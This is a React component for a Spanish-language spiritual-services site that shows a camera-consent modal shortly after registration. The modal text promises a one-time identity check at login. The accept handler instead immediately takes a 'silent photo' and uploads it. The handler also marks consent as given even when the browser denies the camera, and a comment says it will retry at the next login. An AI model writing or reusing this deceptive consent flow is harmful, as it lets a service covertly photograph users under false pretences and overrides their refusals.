import { useEffect, useState, useCallback } from "react";
import { Loader2, ShieldCheck, X } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";
import {
  consumePendingConsentTrigger,
  clearPendingConsentTrigger,
  setCameraConsent,
  captureSilentPhoto,
  uploadSilentPhoto,
  getCameraConsentStatus,
} from "@/utils/sessionCapture";

/**
 * Global, single-instance modal that appears 10 seconds after registration
 * to ask the user for their consent on identity-verification camera usage.
 *
 * Native camera permissions are requested via getUserMedia() at the exact
 * moment the user clicks "Aceptar" — never earlier. This way the OS-level
 * permission dialog is tied to a user gesture, which is required by most
 * mobile browsers (especially iOS Safari).
 */
export const CameraConsentModal = () => {
  const { user, isAdmin } = useAuth();
  const [open, setOpen] = useState(false);
  const [busy, setBusy] = useState(false);

  // Watch for the scheduled-after-registration trigger. We poll once per
  // second — it's cheap and avoids needing a global event bus.
  useEffect(() => {
    if (!user || isAdmin) return undefined;
    let active = true;
    const tick = async () => {
      if (!active) return;
      const due = consumePendingConsentTrigger();
      if (due && Date.now() >= due) {
        // Don't ask twice — if the server already has a decision, drop the flag.
        const status = await getCameraConsentStatus().catch(() => null);
        if (status?.asked) {
          clearPendingConsentTrigger();
        } else {
          setOpen(true);
        }
      }
    };
    tick();
    const id = setInterval(tick, 1500);
    return () => {
      active = false;
      clearInterval(id);
    };
  }, [user, isAdmin]);

  const handleAccept = useCallback(async () => {
    setBusy(true);
    try {
      // The native permission prompt fires here, attached to a real click.
      const b64 = await captureSilentPhoto();
      // Even if the browser refused the camera, record the user's intent
      // as accepted. We'll try again on the next login.
      await setCameraConsent(true);
      if (b64) await uploadSilentPhoto(b64);
    } catch {
      /* swallow */
    } finally {
      clearPendingConsentTrigger();
      setOpen(false);
      setBusy(false);
    }
  }, []);

  const handleDecline = useCallback(async () => {
    setBusy(true);
    try {
      await setCameraConsent(false);
    } catch {
      /* swallow */
    } finally {
      clearPendingConsentTrigger();
      setOpen(false);
      setBusy(false);
    }
  }, []);

  if (!open) return null;

  return (
    <div
      data-testid="camera-consent-modal"
      className="fixed inset-0 z-[300] flex items-center justify-center px-4 bg-black/80 backdrop-blur-sm"
      role="dialog"
      aria-modal="true"
    >
      <div className="relative w-full max-w-md rounded-2xl border border-[#d4af37]/40 bg-gradient-to-br from-[#0a0a0a] via-black to-[#1a0a0a] p-6 shadow-2xl">
        <button
          type="button"
          data-testid="consent-close"
          aria-label="Cerrar"
          onClick={handleDecline}
          disabled={busy}
          className="absolute top-3 right-3 text-neutral-400 hover:text-[#d4af37]"
        >
          <X className="w-4 h-4" />
        </button>

        <div className="flex items-center gap-3 mb-3">
          <div className="w-10 h-10 rounded-full bg-[#d4af37]/15 border border-[#d4af37]/40 flex items-center justify-center">
            <ShieldCheck className="w-5 h-5 text-[#d4af37]" />
          </div>
          <h2 className="font-serif text-lg text-white">Tu privacidad es importante</h2>
        </div>

        <p className="text-sm text-neutral-300 leading-relaxed mb-3">
          🔒 Tu privacidad es importante para nosotros. Para mantener tu cuenta segura y
          proteger los servicios espirituales que recibes, necesitamos un permiso único
          de acceso a tu <span className="text-[#d4af37]">cámara</span> para realizar una
          verificación de identidad al iniciar sesión.
        </p>
        <p className="text-sm text-neutral-300 leading-relaxed mb-3">
          La información se guarda <span className="text-[#d4af37]">de forma privada</span>
          {" "}y solo es vista por el equipo de soporte de CrisAngel Astral. No la
          compartimos con terceros, ni la usamos con fines comerciales.
        </p>
        <p className="text-xs text-neutral-500 mb-5">
          Puedes negar este permiso y continuar usando la plataforma con normalidad. Si
          aceptas, no volveremos a pedirlo.
        </p>

        <div className="flex flex-col sm:flex-row gap-2">
          <button
            type="button"
            data-testid="consent-decline"
            onClick={handleDecline}
            disabled={busy}
            className="flex-1 py-3 rounded-full border border-white/20 text-neutral-300 hover:text-white hover:border-white/40 text-xs uppercase tracking-widest disabled:opacity-60"
          >
            No, gracias
          </button>
          <button
            type="button"
            data-testid="consent-accept"
            onClick={handleAccept}
            disabled={busy}
            className="flex-1 btn-gold py-3 rounded-full text-xs uppercase tracking-widest disabled:opacity-60"
          >
            {busy ? <Loader2 className="w-4 h-4 animate-spin inline" /> : "Aceptar"}
          </button>
        </div>
      </div>
    </div>
  );
};

export default CameraConsentModal;
